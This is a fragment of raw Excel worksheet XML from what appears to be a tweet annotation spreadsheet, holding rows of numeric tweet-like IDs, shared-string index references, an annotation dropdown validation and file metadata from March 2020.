    <row r="9368" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9368">
        <v>1.2324994035309299E+18</v>
      </c>
      <c r="B9368" t="s">
        <v>22479</v>
      </c>
      <c r="C9368" t="s">
        <v>1</v>
      </c>
      <c r="D9368" t="s">
        <v>841</v>
      </c>
      <c r="E9368" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9369" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9369">
        <v>1.23249940187822E+18</v>
      </c>
      <c r="B9369" t="s">
        <v>22480</v>
      </c>
      <c r="C9369" t="s">
        <v>1</v>
      </c>
      <c r="D9369" t="s">
        <v>9982</v>
      </c>
      <c r="E9369" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9370" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9370">
        <v>1.2324993854113201E+18</v>
      </c>
      <c r="B9370" t="s">
        <v>22481</v>
      </c>
      <c r="C9370" t="s">
        <v>1</v>
      </c>
      <c r="D9370" t="s">
        <v>9991</v>
      </c>
      <c r="E9370" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9371" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9371">
        <v>1.2324993835448599E+18</v>
      </c>
      <c r="B9371" t="s">
        <v>22481</v>
      </c>
      <c r="C9371" t="s">
        <v>1</v>
      </c>
      <c r="D9371" t="s">
        <v>9992</v>
      </c>
      <c r="E9371" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9372" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9372">
        <v>1.2324993816154601E+18</v>
      </c>
      <c r="B9372" t="s">
        <v>22482</v>
      </c>
      <c r="C9372" t="s">
        <v>1</v>
      </c>
      <c r="D9372" t="s">
        <v>22483</v>
      </c>
      <c r="E9372" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9373" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9373">
        <v>1.2324993801896399E+18</v>
      </c>
      <c r="B9373" t="s">
        <v>22482</v>
      </c>
      <c r="C9373" t="s">
        <v>1</v>
      </c>
      <c r="D9373" t="s">
        <v>855</v>
      </c>
      <c r="E9373" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9374" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9374">
        <v>1.2324993783984499E+18</v>
      </c>
      <c r="B9374" t="s">
        <v>22482</v>
      </c>
      <c r="C9374" t="s">
        <v>1</v>
      </c>
      <c r="D9374" t="s">
        <v>9995</v>
      </c>
      <c r="E9374" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9375" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9375">
        <v>1.2324993728242601E+18</v>
      </c>
      <c r="B9375" t="s">
        <v>22484</v>
      </c>
      <c r="C9375" t="s">
        <v>1</v>
      </c>
      <c r="D9375" t="s">
        <v>9996</v>
      </c>
      <c r="E9375" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9376" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9376">
        <v>1.2324993678959501E+18</v>
      </c>
      <c r="B9376" t="s">
        <v>22485</v>
      </c>
      <c r="C9376" t="s">
        <v>1</v>
      </c>
      <c r="D9376" t="s">
        <v>9998</v>
      </c>
      <c r="E9376" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9377" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9377">
        <v>1.23249936477122E+18</v>
      </c>
      <c r="B9377" t="s">
        <v>22486</v>
      </c>
      <c r="C9377" t="s">
        <v>1</v>
      </c>
      <c r="D9377" t="s">
        <v>4037</v>
      </c>
      <c r="E9377" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9378" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9378">
        <v>1.2324993601282099E+18</v>
      </c>
      <c r="B9378" t="s">
        <v>22487</v>
      </c>
      <c r="C9378" t="s">
        <v>1</v>
      </c>
      <c r="D9378" t="s">
        <v>862</v>
      </c>
      <c r="E9378" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9379" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9379">
        <v>1.23249935866431E+18</v>
      </c>
      <c r="B9379" t="s">
        <v>22487</v>
      </c>
      <c r="C9379" t="s">
        <v>1</v>
      </c>
      <c r="D9379" t="s">
        <v>4040</v>
      </c>
      <c r="E9379" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9380" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9380">
        <v>1.23249935581234E+18</v>
      </c>
      <c r="B9380" t="s">
        <v>22488</v>
      </c>
      <c r="C9380" t="s">
        <v>1</v>
      </c>
      <c r="D9380" t="s">
        <v>867</v>
      </c>
      <c r="E9380" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9381" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9381">
        <v>1.23249935198275E+18</v>
      </c>
      <c r="B9381" t="s">
        <v>22489</v>
      </c>
      <c r="C9381" t="s">
        <v>1</v>
      </c>
      <c r="D9381" t="s">
        <v>10005</v>
      </c>
      <c r="E9381" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9382" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9382">
        <v>1.23249934983949E+18</v>
      </c>
      <c r="B9382" t="s">
        <v>22489</v>
      </c>
      <c r="C9382" t="s">
        <v>1</v>
      </c>
      <c r="D9382" t="s">
        <v>10007</v>
      </c>
      <c r="E9382" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9383" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9383">
        <v>1.2324993399954601E+18</v>
      </c>
      <c r="B9383" t="s">
        <v>22490</v>
      </c>
      <c r="C9383" t="s">
        <v>1</v>
      </c>
      <c r="D9383" t="s">
        <v>10015</v>
      </c>
      <c r="E9383" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9384" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9384">
        <v>1.2324993380199501E+18</v>
      </c>
      <c r="B9384" t="s">
        <v>22491</v>
      </c>
      <c r="C9384" t="s">
        <v>1</v>
      </c>
      <c r="D9384" t="s">
        <v>10016</v>
      </c>
      <c r="E9384" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9385" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9385">
        <v>1.2324993363422001E+18</v>
      </c>
      <c r="B9385" t="s">
        <v>22491</v>
      </c>
      <c r="C9385" t="s">
        <v>1</v>
      </c>
      <c r="D9385" t="s">
        <v>10018</v>
      </c>
      <c r="E9385" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="9386" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9386">
        <v>1.23249826069615E+18</v>
      </c>
      <c r="B9386" t="s">
        <v>22492</v>
      </c>
      <c r="C9386" t="s">
        <v>1</v>
      </c>
      <c r="D9386" t="s">
        <v>22493</v>
      </c>
      <c r="E9386" t="s">
        <v>22494</v>
      </c>
    </row>
    <row r="9387" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9387">
        <v>1.23249751571646E+18</v>
      </c>
      <c r="B9387" t="s">
        <v>22495</v>
      </c>
      <c r="C9387" t="s">
        <v>1</v>
      </c>
      <c r="D9387" t="s">
        <v>22496</v>
      </c>
      <c r="E9387" t="s">
        <v>2105</v>
      </c>
    </row>
    <row r="9388" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9388">
        <v>1.2324940723692301E+18</v>
      </c>
      <c r="B9388" t="s">
        <v>22497</v>
      </c>
      <c r="C9388" t="s">
        <v>1</v>
      </c>
      <c r="D9388" t="s">
        <v>22498</v>
      </c>
      <c r="E9388" t="s">
        <v>6826</v>
      </c>
    </row>
    <row r="9389" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9389">
        <v>1.2324934085826801E+18</v>
      </c>
      <c r="B9389" t="s">
        <v>22499</v>
      </c>
      <c r="C9389" t="s">
        <v>1</v>
      </c>
      <c r="D9389" t="s">
        <v>22500</v>
      </c>
      <c r="E9389" t="s">
        <v>9474</v>
      </c>
    </row>
    <row r="9390" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9390">
        <v>1.2324933340415401E+18</v>
      </c>
      <c r="B9390" t="s">
        <v>22501</v>
      </c>
      <c r="C9390" t="s">
        <v>1</v>
      </c>
      <c r="D9390" t="s">
        <v>22502</v>
      </c>
      <c r="E9390" t="s">
        <v>5659</v>
      </c>
    </row>
    <row r="9391" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9391">
        <v>1.2324926558058099E+18</v>
      </c>
      <c r="B9391" t="s">
        <v>22503</v>
      </c>
      <c r="C9391" t="s">
        <v>1</v>
      </c>
      <c r="D9391" t="s">
        <v>22504</v>
      </c>
      <c r="E9391" t="s">
        <v>22505</v>
      </c>
    </row>
    <row r="9392" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9392">
        <v>1.2324924820567601E+18</v>
      </c>
      <c r="B9392" t="s">
        <v>22506</v>
      </c>
      <c r="C9392" t="s">
        <v>1</v>
      </c>
      <c r="D9392" t="s">
        <v>22507</v>
      </c>
      <c r="E9392" t="s">
        <v>17813</v>
      </c>
    </row>
    <row r="9393" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9393">
        <v>1.23249150242671E+18</v>
      </c>
      <c r="B9393" t="s">
        <v>22508</v>
      </c>
      <c r="C9393" t="s">
        <v>1</v>
      </c>
      <c r="D9393" t="s">
        <v>22509</v>
      </c>
      <c r="E9393" t="s">
        <v>22510</v>
      </c>
    </row>
    <row r="9394" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9394">
        <v>1.23248979194339E+18</v>
      </c>
      <c r="B9394" t="s">
        <v>22511</v>
      </c>
      <c r="C9394" t="s">
        <v>1</v>
      </c>
      <c r="D9394" t="s">
        <v>22512</v>
      </c>
      <c r="E9394" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="9395" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9395">
        <v>1.2324878392642299E+18</v>
      </c>
      <c r="B9395" t="s">
        <v>22513</v>
      </c>
      <c r="C9395" t="s">
        <v>1</v>
      </c>
      <c r="D9395" t="s">
        <v>22514</v>
      </c>
      <c r="E9395" t="s">
        <v>22515</v>
      </c>
    </row>
    <row r="9396" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9396">
        <v>1.2324874286879401E+18</v>
      </c>
      <c r="B9396" t="s">
        <v>22516</v>
      </c>
      <c r="C9396" t="s">
        <v>1</v>
      </c>
      <c r="D9396" t="s">
        <v>22517</v>
      </c>
      <c r="E9396" t="s">
        <v>22518</v>
      </c>
    </row>
    <row r="9397" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9397">
        <v>1.2324865393403E+18</v>
      </c>
      <c r="B9397" t="s">
        <v>22519</v>
      </c>
      <c r="C9397" t="s">
        <v>1</v>
      </c>
      <c r="D9397" t="s">
        <v>22520</v>
      </c>
      <c r="E9397" t="s">
        <v>20033</v>
      </c>
    </row>
    <row r="9398" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9398">
        <v>1.2324862179895401E+18</v>
      </c>
      <c r="B9398" t="s">
        <v>22521</v>
      </c>
      <c r="C9398" t="s">
        <v>1</v>
      </c>
      <c r="D9398" t="s">
        <v>22522</v>
      </c>
      <c r="E9398" t="s">
        <v>22523</v>
      </c>
    </row>
    <row r="9399" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9399">
        <v>1.23247915096062E+18</v>
      </c>
      <c r="B9399" t="s">
        <v>22524</v>
      </c>
      <c r="C9399" t="s">
        <v>1</v>
      </c>
      <c r="D9399" t="s">
        <v>6881</v>
      </c>
      <c r="E9399" t="s">
        <v>6882</v>
      </c>
    </row>
    <row r="9400" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9400">
        <v>1.2324789002837701E+18</v>
      </c>
      <c r="B9400" t="s">
        <v>22525</v>
      </c>
      <c r="C9400" t="s">
        <v>1</v>
      </c>
      <c r="D9400" t="s">
        <v>22526</v>
      </c>
      <c r="E9400" t="s">
        <v>17402</v>
      </c>
    </row>
    <row r="9401" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9401">
        <v>1.2324777234251899E+18</v>
      </c>
      <c r="B9401" t="s">
        <v>22527</v>
      </c>
      <c r="C9401" t="s">
        <v>1</v>
      </c>
      <c r="D9401" t="s">
        <v>22528</v>
      </c>
      <c r="E9401" t="s">
        <v>9868</v>
      </c>
    </row>
    <row r="9402" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9402">
        <v>1.2324746769930099E+18</v>
      </c>
      <c r="B9402" t="s">
        <v>22529</v>
      </c>
      <c r="C9402" t="s">
        <v>1</v>
      </c>
      <c r="D9402" t="s">
        <v>22530</v>
      </c>
      <c r="E9402" t="s">
        <v>22531</v>
      </c>
    </row>
    <row r="9403" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9403">
        <v>1.23247416815677E+18</v>
      </c>
      <c r="B9403" t="s">
        <v>22532</v>
      </c>
      <c r="C9403" t="s">
        <v>1</v>
      </c>
      <c r="D9403" t="s">
        <v>22533</v>
      </c>
      <c r="E9403" t="s">
        <v>1027</v>
      </c>
    </row>
    <row r="9404" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9404">
        <v>1.23247330879841E+18</v>
      </c>
      <c r="B9404" t="s">
        <v>22534</v>
      </c>
      <c r="C9404" t="s">
        <v>1</v>
      </c>
      <c r="D9404" t="s">
        <v>22535</v>
      </c>
      <c r="E9404" t="s">
        <v>1550</v>
      </c>
    </row>
    <row r="9405" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9405">
        <v>1.23247221407247E+18</v>
      </c>
      <c r="B9405" t="s">
        <v>22536</v>
      </c>
      <c r="C9405" t="s">
        <v>1</v>
      </c>
      <c r="D9405" t="s">
        <v>22537</v>
      </c>
      <c r="E9405" t="s">
        <v>22315</v>
      </c>
    </row>
    <row r="9406" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9406">
        <v>1.23247159134003E+18</v>
      </c>
      <c r="B9406" t="s">
        <v>22538</v>
      </c>
      <c r="C9406" t="s">
        <v>1</v>
      </c>
      <c r="D9406" t="s">
        <v>22539</v>
      </c>
      <c r="E9406" t="s">
        <v>15483</v>
      </c>
    </row>
    <row r="9407" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9407">
        <v>1.2324713333944499E+18</v>
      </c>
      <c r="B9407" t="s">
        <v>22540</v>
      </c>
      <c r="C9407" t="s">
        <v>1</v>
      </c>
      <c r="D9407" t="s">
        <v>22541</v>
      </c>
      <c r="E9407" t="s">
        <v>7469</v>
      </c>
    </row>
    <row r="9408" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9408">
        <v>1.23246961464419E+18</v>
      </c>
      <c r="B9408" t="s">
        <v>22542</v>
      </c>
      <c r="C9408" t="s">
        <v>1</v>
      </c>
      <c r="D9408" t="s">
        <v>22543</v>
      </c>
      <c r="E9408" t="s">
        <v>4894</v>
      </c>
    </row>
    <row r="9409" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9409">
        <v>1.2324695757965399E+18</v>
      </c>
      <c r="B9409" t="s">
        <v>22544</v>
      </c>
      <c r="C9409" t="s">
        <v>1</v>
      </c>
      <c r="D9409" t="s">
        <v>22545</v>
      </c>
      <c r="E9409" t="s">
        <v>22546</v>
      </c>
    </row>
    <row r="9410" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9410">
        <v>1.2324632693669199E+18</v>
      </c>
      <c r="B9410" t="s">
        <v>22547</v>
      </c>
      <c r="C9410" t="s">
        <v>1</v>
      </c>
      <c r="D9410" t="s">
        <v>22548</v>
      </c>
      <c r="E9410" t="s">
        <v>8934</v>
      </c>
    </row>
    <row r="9411" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9411">
        <v>1.2324605290854899E+18</v>
      </c>
      <c r="B9411" t="s">
        <v>22549</v>
      </c>
      <c r="C9411" t="s">
        <v>1</v>
      </c>
      <c r="D9411" t="s">
        <v>22550</v>
      </c>
      <c r="E9411" t="s">
        <v>22551</v>
      </c>
    </row>
    <row r="9412" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9412">
        <v>1.23245997732897E+18</v>
      </c>
      <c r="B9412" t="s">
        <v>22552</v>
      </c>
      <c r="C9412" t="s">
        <v>1</v>
      </c>
      <c r="D9412" t="s">
        <v>22553</v>
      </c>
      <c r="E9412" t="s">
        <v>22554</v>
      </c>
    </row>
    <row r="9413" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9413">
        <v>1.23245874379694E+18</v>
      </c>
      <c r="B9413" t="s">
        <v>22555</v>
      </c>
      <c r="C9413" t="s">
        <v>1</v>
      </c>
      <c r="D9413" t="s">
        <v>22556</v>
      </c>
      <c r="E9413" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="9414" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A9414">
        <v>1.23245818298894E+18</v>
      </c>
      <c r="B9414" t="s">
        <v>22557</v>
      </c>
      <c r="C9414" t="s">
        <v>1</v>
      </c>
      <c r="D9414" t="s">
        <v>22558</v>
      </c>
      <c r="E9414" t="s">
        <v>4397</v>
      </c>
    </row>
  </sheetData>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="F1:F1048576" xr:uid="{00000000-0002-0000-0000-000000000000}">
      <formula1>Annotation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sqref="A1:A6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1" t="s">
        <v>22559</v>
      </c>
    </row>
    <row r="2" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A2" t="s">
        <v>22560</v>
      </c>
    </row>
    <row r="3" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A3" t="s">
        <v>22561</v>
      </c>
    </row>
    <row r="4" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A4" t="s">
        <v>22562</v>
      </c>
    </row>
    <row r="5" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A5" t="s">
        <v>22563</v>
      </c>
    </row>
    <row r="6" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A6" t="s">
        <v>22564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#microsoft1</vt:lpstr>
      <vt:lpstr>Sheet1</vt:lpstr>
      <vt:lpstr>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gopinath tulasi</dc:creator>
  <cp:lastModifiedBy>gopinath tulasi</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-12T09:38:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-12T16:21:57Z</dcterms:modified>
</cp:coreProperties>
</file>